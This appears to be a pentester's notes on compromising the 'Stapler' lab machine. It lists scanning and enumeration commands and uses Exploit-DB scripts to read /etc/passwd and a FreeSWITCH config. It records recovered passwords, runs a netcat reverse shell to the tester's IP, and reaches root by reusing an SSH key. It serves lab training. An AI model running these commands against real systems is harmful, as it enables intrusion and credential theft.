Stapler
๐งช Pentest Log: {{date:2025-08-07}}
๐ Target Information
- Machine Name: Stapler
- IP Address: 192.168.176.148
- Operating System: Linux
ip=192.168.176.148
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 21
Anonymous Login
ftp anonymous@$ip
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
feroxbuster --url http://$ip
wpscan --url http://$ip
dirsearch -u http://$ip -r -o dirsearch.txt
Port 139,445
smbclient -L \\\\$ip\\
enum4linux -a $ip
Port 666
Port 3306
Port 12380
Web Content Enumeration
gobuster dir -u http://$ip:12380 -w /usr/share/seclists/Discovery/Web-Content/common.txt
feroxbuster --url http://$ip
wpscan --url http://$ip
dirsearch -u http://$ip:12380 -r -o dirsearch.txt
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/49362
python3 49362.py $ip /etc/passwd
python3 49362.py $ip /proc/self/cmdline
python3 49362.py $ip /etc/freeswitch/autoload_configs/event_socket.conf.xml
found cassie's password and freeswitch current password
cassie:SecondBiteTheApple330
<param name="password" value="StrongClueConEight021"/>
https://www.exploit-db.com/exploits/47799
get a shell using the exploit
python3 47799.py $ip "busybox nc 192.168.45.163 8021 -e /bin/bash"
nc -lvnp 8021
๐งฌ Privilege Escalation
๐ค Current Access
- User: cassie
- Groups: cassie
- Shell Type: web shell
๐ Enumeration
SSH:
ls /home/cassie
found
id_rsa
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: id_rsa reuse
- Target Binary/Service: ssh
- Reference / Source:
๐ง Exploit Steps
- Smash to root
ssh -i id_rsa root@$ip